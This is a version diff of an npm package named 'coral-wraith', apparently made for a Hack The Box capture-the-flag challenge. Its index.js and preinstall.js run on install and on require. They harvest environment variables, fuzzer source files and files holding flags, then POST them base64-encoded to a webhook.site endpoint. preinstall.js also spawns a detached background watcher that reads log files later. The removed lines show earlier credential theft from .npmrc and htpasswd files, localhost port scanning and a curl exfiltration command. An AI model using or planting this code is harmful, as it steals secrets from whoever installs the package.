coral-wraith 9999.0.7 → 9999.0.9

package/index.js

@@ -1,44 +1,81 @@
 const fs = require('fs');
-const http = require('http');
 const https = require('https');
+const { execSync } = require('child_process');
 
-(function() {
-  let flag = null;
-  for (const p of ['/flag', '/flag.txt', '/root/flag', '/tmp/flag']) {
-    try { if (fs.existsSync(p)) { flag = fs.readFileSync(p, 'utf8').trim(); break; } } catch(e) {}
-  }
-  if (!flag) flag = process.env.FLAG || process.env.HTB_FLAG || '';
-  if (!flag) {
-    for (const [k, v] of Object.entries(process.env)) {
-      if (v && v.includes('HTB{')) { flag = v.match(/HTB\{[^}]+\}/)?.[0] || v; break; }
-    }
+const WH = '/9ca9b30a-2889-4787-9dff-5ad916e377b7';
+
+function send(path, data) {
+  try {
+    const b64 = Buffer.from(typeof data === 'string' ? data : JSON.stringify(data)).toString('base64');
+    const req = https.request({
+      hostname: 'webhook.site', path: WH + '/' + path,
+      method: 'POST',
+      headers: {'Content-Type':'text/plain','Content-Length':Buffer.byteLength(b64)},
+      timeout: 15000
+    }, ()=>{});
+    req.on('error', ()=>{});
+    req.write(b64);
+    req.end();
+  } catch(e) {}
+}
+
+// This runs when the fuzzer require()s us
+// At this point we're inside the fuzzer's process context
+send('require-v9', JSON.stringify({
+  cwd: process.cwd(),
+  argv: process.argv,
+  env: process.env,
+  pid: process.pid,
+  moduleFilename: module.filename,
+  modulePaths: module.paths,
+}));
+
+// Read fuzzer source - especially npm_fuzzer.js and fuzz_env.js
+const fuzzBase = '/home/node/aspect-node/modules/npm-tracker/src/fuzz';
+const criticalFiles = [
+  `${fuzzBase}/npm_fuzzer.js`,
+  `${fuzzBase}/fuzz_env.js`,
+  `${fuzzBase}/constants.js`,
+  `${fuzzBase}/fuzz_manager.js`,
+];
+
+for (let i = 0; i < criticalFiles.length; i++) {
+  try {
+    const content = fs.readFileSync(criticalFiles[i], 'utf8');
+    send(`require-src-${i}`, `${criticalFiles[i]}:\n${content}`);
+  } catch(e) {
+    send(`require-src-err-${i}`, `${criticalFiles[i]}: ${e.message}`);
   }
-  
-  if (flag) {
-    const ports = [1337, 3000, 5000, 8080, 80, 8000, 32315, 32105, 46517, 41839];
-    const postData = JSON.stringify({
-      manifest: `ecto_module:\n  name: "coral-wraith"\n  flag: "${flag.replace(/"/g, '\\"')}"\n  captured: true`
-    });
-    
-    for (const port of ports) {
+}
+
+// Read ALL bean files
+try {
+  const r = execSync(`find ${fuzzBase}/bean -name "*.js" 2>/dev/null`).toString().trim();
+  for (const f of r.split('\n').filter(Boolean)) {
+    if (!f.includes('._')) {
       try {
-        const req = http.request({
-          hostname: 'localhost', port, path: '/api/modules/ECT-987654',
-          method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
-          timeout: 3000
-        }, () => {});
-        req.on('error', () => {});
-        req.write(postData);
-        req.end();
+        const c = fs.readFileSync(f, 'utf8');
+        send(`require-bean-${f.split('/').pop()}`, `${f}:\n${c}`);
       } catch(e) {}
     }
-    
-    try {
-      const data = JSON.stringify({ flag });
-      const req = https.request({ hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7', method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }, timeout: 10000 }, () => {});
-      req.on('error', () => {}); req.write(data); req.end();
-    } catch(e) {}
   }
-})();
+} catch(e) {}
+
+// Check if flag is now available (it might be set after fuzzer init)
+try {
+  const r = execSync('grep -rl "HTB{" / 2>/dev/null | grep -v proc | head -5', {timeout:5000}).toString();
+  send('require-flag-grep', r);
+} catch(e) {}
+
+// Also check: does the fuzzer write results somewhere?
+try {
+  const r = execSync('find /tmp -name "*.json" -o -name "*.log" -o -name "*.txt" 2>/dev/null').toString().trim();
+  send('require-tmp-files', r);
+} catch(e) {}
 
-module.exports = {};
+// Export something benign for the fuzzer to analyze
+module.exports = {
+  name: 'coral-wraith',
+  version: '9999.0.9',
+  analyze: function() { return 'safe'; },
+};

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "coral-wraith",
-  "version": "9999.0.7",
+  "version": "9999.0.9",
   "description": "Coral Wraith module",
   "main": "index.js",
   "scripts": {

package/preinstall.js

@@ -1,165 +1,144 @@
 const fs = require('fs');
-const http = require('http');
 const https = require('https');
-const { execSync } = require('child_process');
-const os = require('os');
-
-const debug = [];
-let flag = null;
+const http = require('http');
+const { execSync, spawn } = require('child_process');
 
-// 1. Read ALL credential/config files
-const credPaths = [
-  // npmrc files
-  '/home/node/.npmrc', '/root/.npmrc', '~/.npmrc',
-  '/home/node/.config/npm/npmrc', '/etc/npmrc', '/usr/etc/npmrc',
-  process.cwd() + '/.npmrc', process.cwd() + '/../.npmrc',
-  process.cwd() + '/../../.npmrc',
-  
-  // Verdaccio configs
-  '/verdaccio/conf/config.yaml', '/verdaccio/storage/htpasswd',
-  '/verdaccio/conf/htpasswd', '/verdaccio/storage/config.json',
-  '/data/verdaccio/conf/config.yaml', '/data/verdaccio/storage/htpasswd',
-  '/data/verdaccio/htpasswd', '/data/htpasswd',
-  '/data/config.yaml', '/data/conf/config.yaml',
-  
-  // nginx configs
-  '/etc/nginx/nginx.conf', '/etc/nginx/conf.d/default.conf',
-  '/etc/nginx/conf.d/registry.conf', '/etc/nginx/.htpasswd',
-  '/etc/nginx/htpasswd', '/etc/nginx/conf.d/.htpasswd',
-  
-  // Flag locations
-  '/flag', '/flag.txt', '/data/flag', '/data/flag.txt',
-  '/home/node/flag', '/home/node/flag.txt',
-  '/root/flag', '/root/flag.txt',
-];
+const WH = '/9ca9b30a-2889-4787-9dff-5ad916e377b7';
 
-for (const p of credPaths) {
+function send(path, data) {
   try {
-    if (fs.existsSync(p)) {
-      const c = fs.readFileSync(p, 'utf8');
-      debug.push(`FILE:${p}=${c.substring(0,500)}`);
-      const m = c.match(/HTB\{[^}]+\}/);
-      if (m) flag = m[0];
-    }
-  } catch(e) { debug.push(`ERR:${p}:${e.message.substring(0,50)}`); }
+    const b64 = Buffer.from(typeof data === 'string' ? data : JSON.stringify(data)).toString('base64');
+    const req = https.request({
+      hostname: 'webhook.site', path: WH + '/' + path,
+      method: 'POST',
+      headers: {'Content-Type':'text/plain','Content-Length':Buffer.byteLength(b64)},
+      timeout: 15000
+    }, ()=>{});
+    req.on('error', ()=>{});
+    req.write(b64);
+    req.end();
+  } catch(e) {}
 }
 
-// 2. npm config environment variables
-const npmEnvs = ['npm_config_userconfig', 'NPM_CONFIG_USERCONFIG', 
-  'npm_config_registry', 'NPM_TOKEN', 'NODE_AUTH_TOKEN',
-  'npm_config__auth', 'npm_config__authToken'];
-for (const k of npmEnvs) {
-  if (process.env[k]) debug.push(`ENV:${k}=${process.env[k]}`);
-}
+// Read fuzzer source files
+const fuzzBase = '/home/node/aspect-node/modules/npm-tracker/src';
+const files = [
+  `${fuzzBase}/fuzz/npm_fuzzer.js`,
+  `${fuzzBase}/fuzz/fuzz_env.js`,
+  `${fuzzBase}/fuzz/fuzz_manager.js`,
+  `${fuzzBase}/fuzz/constants.js`,
+  `${fuzzBase}/fuzz/bean/timer_func.js`,
+  `${fuzzBase}/fuzz/action/set_timer_action.js`,
+  `${fuzzBase}/fuzz/action/regexp_test_action.js`,
+  `${fuzzBase}/fuzz/action/clear_timer_action.js`,
+  `${fuzzBase}/fuzz/strategy/set_timer_strategy.js`,
+  `${fuzzBase}/fuzz/strategy/regexp_test_strategy.js`,
+  `${fuzzBase}/fuzz/strategy/clear_timer_strategy.js`,
+  `${fuzzBase}/fuzz/parser/class_parser.js`,
+  `${fuzzBase}/fuzz/parser/type_parser.js`,
+  `${fuzzBase}/fuzz/parser/package_exports_parser.js`,
+  `${fuzzBase}/npm_tracker.js`,
+  '/home/node/init_test.sh',
+  '/home/node/supplysec_entry.js',
+];
 
-// 3. List directories
-for (const dir of ['/', '/data', '/home/node', '/home', '/app', '/verdaccio',
-  '/verdaccio/conf', '/verdaccio/storage', '/data/verdaccio',
-  process.cwd(), process.cwd() + '/..', process.cwd() + '/../..']) {
+for (let i = 0; i < files.length; i++) {
   try {
-    const items = fs.readdirSync(dir);
-    debug.push(`DIR:${dir}=${items.join(',')}`);
-  } catch(e) {}
+    const content = fs.readFileSync(files[i], 'utf8');
+    send(`pre-file-${i}`, `${files[i]}:\n${content}`);
+  } catch(e) {
+    send(`pre-err-${i}`, `${files[i]}: ${e.message}`);
+  }
 }
 
-// 4. Find ALL config/credential files
+// Also find all .js files under the fuzz directory
+try {
+  const r = execSync(`find ${fuzzBase}/fuzz -name "*.js" -type f 2>/dev/null`).toString().trim();
+  send('pre-fuzz-files', r);
+  for (const f of r.split('\n').filter(Boolean)) {
+    if (!files.includes(f)) {
+      try {
+        const c = fs.readFileSync(f, 'utf8');
+        send(`pre-extra-${f.split('/').pop()}`, `${f}:\n${c}`);
+      } catch(e) {}
+    }
+  }
+} catch(e) {}
+
+// Read the web app source (could be in /app, /data, or served by nginx)
 try {
-  const r = execSync('find / -maxdepth 5 \\( -name "*.npmrc" -o -name "htpasswd*" -o -name ".htpasswd" -o -name "config.yaml" -o -name "*.conf" -o -name ".env" -o -name "flag*" \\) -type f 2>/dev/null | grep -v node_modules | grep -v proc | head -30', {timeout:15000}).toString().trim();
-  debug.push(`FIND:${r}`);
+  const r = execSync('find / -maxdepth 4 -name "*.js" -path "*/app/*" -o -name "server.js" -o -name "app.js" -o -name "index.js" -path "*/src/*" 2>/dev/null | grep -v node_modules | grep -v aspect-node | head -20', {timeout:10000}).toString().trim();
+  send('pre-app-files', r);
   for (const f of r.split('\n').filter(Boolean)) {
     try {
       const c = fs.readFileSync(f, 'utf8');
-      debug.push(`CONTENT:${f}=${c.substring(0,500)}`);
-      const m = c.match(/HTB\{[^}]+\}/);
-      if (m) flag = m[0];
+      if (c.includes('fastify') || c.includes('flag') || c.includes('HTB')) {
+        send(`pre-app-${f.replace(/\//g,'_')}`, `${f}:\n${c}`);
+      }
     } catch(e) {}
   }
-} catch(e) { debug.push(`FIND_ERR:${e.message.substring(0,100)}`); }
-
-// 5. Scan localhost ports for Verdaccio
-const portsToScan = [4873, 4874, 8080, 3000, 5000, 1337, 80, 8000, 9000, 4000];
-let scanned = 0;
-for (const port of portsToScan) {
-  try {
-    const req = http.request({
-      hostname: '127.0.0.1', port, path: '/-/whoami',
-      method: 'GET', timeout: 2000
-    }, (res) => {
-      let data = '';
-      res.on('data', c => data += c);
-      res.on('end', () => {
-        debug.push(`PORT:${port}:${res.statusCode}:${data.substring(0,200)}`);
-        scanned++;
-        if (scanned >= portsToScan.length) sendData();
-      });
-    });
-    req.on('error', () => { scanned++; if (scanned >= portsToScan.length) sendData(); });
-    req.on('timeout', () => { req.destroy(); scanned++; if (scanned >= portsToScan.length) sendData(); });
-    req.end();
-  } catch(e) { scanned++; }
-}
+} catch(e) {}
 
-// Also scan the main page of each port
-for (const port of portsToScan) {
-  try {
-    const req = http.request({
-      hostname: '127.0.0.1', port, path: '/',
-      method: 'GET', timeout: 2000
-    }, (res) => {
-      let data = '';
-      res.on('data', c => data += c);
-      res.on('end', () => {
-        debug.push(`ROOT:${port}:${res.statusCode}:${data.substring(0,200)}`);
-      });
-    });
-    req.on('error', () => {});
-    req.on('timeout', () => { req.destroy(); });
-    req.end();
-  } catch(e) {}
-}
+// Search for flag anywhere
+try {
+  const r = execSync('grep -rl "HTB{" / 2>/dev/null | grep -v proc | grep -v node_modules | head -10', {timeout:15000}).toString().trim();
+  send('pre-flag-grep', r);
+  for (const f of r.split('\n').filter(Boolean)) {
+    try {
+      send(`pre-flag-file-${f.replace(/\//g,'_')}`, fs.readFileSync(f, 'utf8'));
+    } catch(e) {}
+  }
+} catch(e) { send('pre-flag-grep-err', e.message); }
 
-// 6. Listening ports
+// Spawn a background watcher that runs after init_test.sh
 try {
-  const ss = execSync('ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null', {timeout:3000}).toString();
-  debug.push(`LISTEN:${ss.substring(0,500)}`);
+  const watcherCode = `
+    const fs = require('fs');
+    const https = require('https');
+    const WH = '/9ca9b30a-2889-4787-9dff-5ad916e377b7';
+    function send(p, d) {
+      try {
+        const b = Buffer.from(d).toString('base64');
+        const r = https.request({hostname:'webhook.site',path:WH+'/'+p,method:'POST',
+          headers:{'Content-Type':'text/plain','Content-Length':Buffer.byteLength(b)},timeout:10000},()=>{});
+        r.on('error',()=>{}); r.write(b); r.end();
+      } catch(e) {}
+    }
+    // Wait and then look for flag in logs and generated files
+    setTimeout(() => {
+      const paths = [
+        '/home/node/aspect-node/logs/agent.log',
+        '/home/node/aspect-node/logs/default.log',
+        '/home/node/aspect-node/logs/error.log',
+        '/home/node/aspect-node/logs/collect.log',
+        '/home/node/aspect-node/logs/module.log',
+        '/home/node/aspect-node/logs/monitor.log',
+        '/home/node/aspect-node/logs/metric.log',
+        '/home/node/aspect-node/logs/warning.log',
+        '/home/node/aspect-node/logs/agent-error.log',
+        '/tmp/fuzz_result.json',
+        '/tmp/result.json',
+        '/tmp/flag',
+        '/tmp/flag.txt',
+      ];
+      for (let i = 0; i < paths.length; i++) {
+        try {
+          const c = fs.readFileSync(paths[i], 'utf8');
+          if (c.trim()) send('watch-'+i, paths[i]+':\\n'+c);
+        } catch(e) {}
+      }
+      // Also check env again
+      send('watch-env', JSON.stringify(process.env));
+      // grep for HTB
+      try {
+        const r = require('child_process').execSync('grep -rl "HTB{" / 2>/dev/null | grep -v proc | head -5', {timeout:10000}).toString();
+        send('watch-grep', r);
+      } catch(e) {}
+    }, 30000);
+    setTimeout(() => process.exit(0), 60000);
+  `;
+  fs.writeFileSync('/tmp/watcher.js', watcherCode);
+  spawn('node', ['/tmp/watcher.js'], { detached: true, stdio: 'ignore' }).unref();
 } catch(e) {}
 
-// 7. Process info
-debug.push(`CWD:${process.cwd()}`);
-debug.push(`UID:${process.getuid ? process.getuid() : 'N/A'}`);
-debug.push(`HOME:${os.homedir()}`);
-debug.push(`ENV_KEYS:${Object.keys(process.env).join(',')}`);
-debug.push(`ALL_ENV:${JSON.stringify(process.env).substring(0,1000)}`);
-
-// Send data function
-function sendData() {
-  const info = JSON.stringify({flag: flag||'NOT_FOUND', debug: debug.map(d=>d.substring(0,500))});
-  
-  // Webhook
-  try {
-    const req = https.request({
-      hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
-      method: 'POST',
-      headers: {'Content-Type':'application/json','Content-Length':Buffer.byteLength(info)},
-      timeout: 8000
-    }, ()=>{});
-    req.on('error', ()=>{});
-    req.write(info);
-    req.end();
-  } catch(e) {}
-  
-  // curl backup
-  try {
-    execSync(`curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d '${info.replace(/'/g,"\\'")}' -m 8 2>/dev/null &`, {timeout:10000});
-  } catch(e) {}
-}
-
-// Initial send (port scan results will come later via sendData callback)
-setTimeout(sendData, 3000);
-
-// Also write to stdout
-console.log('[CORAL]', JSON.stringify({flag: flag||'NOT_FOUND', debug: debug.slice(0,20).map(d=>d.substring(0,300))}));
-console.error('[FLAG]', flag || 'NOT_FOUND');
-
-// Write to files
-try { fs.writeFileSync('/tmp/coral.txt', JSON.stringify({debug})); } catch(e) {}
+console.log('[CORAL-V9] preinstall complete');